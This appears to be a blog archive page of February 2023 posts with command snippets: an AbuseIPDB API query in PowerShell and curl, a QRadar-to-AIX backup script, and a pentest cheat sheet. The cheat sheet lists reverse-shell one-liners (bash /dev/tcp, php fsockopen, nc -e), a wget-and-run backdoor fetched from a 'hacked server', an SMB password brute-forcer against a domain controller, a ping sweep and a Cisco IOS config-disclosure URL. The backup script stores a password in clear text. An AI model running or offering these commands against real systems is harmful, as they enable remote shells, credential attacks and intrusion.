
Showing posts from February 2023

AbuseIPDB API query with Powershell

#Powershell version
$myparams = @{
    ipAddress    = "xxx.xxx.xxx.xxx"
    maxAgeInDays = "90"
    verbose      = "verbose"
}
$myheaders = @{
    Key    = "your API Key of AbuseIPDB"
    Accept = "application/json"
}
# For a GET request, Invoke-WebRequest sends the -Body hashtable as query-string parameters
$result = (Invoke-WebRequest -Uri https://api.abuseipdb.com/api/v2/check -Method Get -ContentType application/x-www-form-urlencoded -Body $myparams -Headers $myheaders)
# Parse the JSON body of the response (cmdlet name corrected to ConvertFrom-Json)
$obj = (ConvertFrom-Json $result.Content)
Write-Host "---------------------------------------------------------------"
Write-Host "IP: $($obj.data.ipAddress)"
Write-Host "Domain: $($obj.data.domain)"
Write-Host "Country: $($obj.data.countryName)"
Write-Host "ISP: $($obj.data.isp)"
Write-Host "AbuseConfidenceScore: $($obj.data.abuseConfidenceScore)%"
Write-Host "------------------------------------------------------------"
#Curl version:
Ex1. from AbuseIPDB document
curl -G https://api.abuseipdb.com/api/v2/check \
  --data-urlencode &q

reverse shell

wget http://<hacked server>/backdoor.sh -O | sh
xterm
xterm -display 10.0.0.1:1
@ start listener: xnest :1
@ add permission to connect: xhost +victimIP
php
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3"); '
Bash
bash -i >& /dev/tcp/10.0.0.1/880 0>&1
netcat
nc 10.0.0.1 1234 -e /bin/sh
nc 10.0.0.1 1234 -e cmd.exe

Nested for ping sweep

for /L %i in (10,1,254) do @(for /L %x in (10,1,254) do @ping -n 1 -w 100 10.10.%i.%x 2>nul | find "Reply" && echo 10.10.%i.%x >> alive_ip.txt)
Domain brute forcer
for /F %n in (names.txt) do for /F %p in (pawds.txt) do net use \\DC01\IPC$ \\DC01\IPC$ > NUL
dns reverse lookup
for /L %i in (100,1,105) do @ nslookup 1.1.1.%i | findstr /i /c:"Name" >> dns.txt && echo Server: 1.1.1.%i >> dns.txt
CISCO IOS 11.2-12.2
http://<ip>/level/<16-99>/exec/show/config

Backup IBM Qradar 7.4.2 file to IBM AIX 7.2

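# from QRadar EP terminal
ssh-keygen -t rsa
ssh-copy-id user@AIX    # did not work
## so we try the expect program method instead
# touch scp.exp and enter the following content
#!/usr/bin/expect
# note: the password below is stored in clear text, so restrict access to this file (chmod 700 scp.exp)
set filename [lindex $argv 0]
spawn scp -r $filename user@AIX:~
expect {
  # keep matching after accepting the host key so the password prompt is also answered
  "(yes/no)?" { send "yes\n"; exp_continue }
  "*password:" { send "yourpass\n"; exp_continue }
}
interact
expect eof
# touch backup.sh and enter the following content
# iterate with a glob instead of parsing ls, and quote the name so spaces are handled
for filename in *
do
  ./scp.exp "$filename"
done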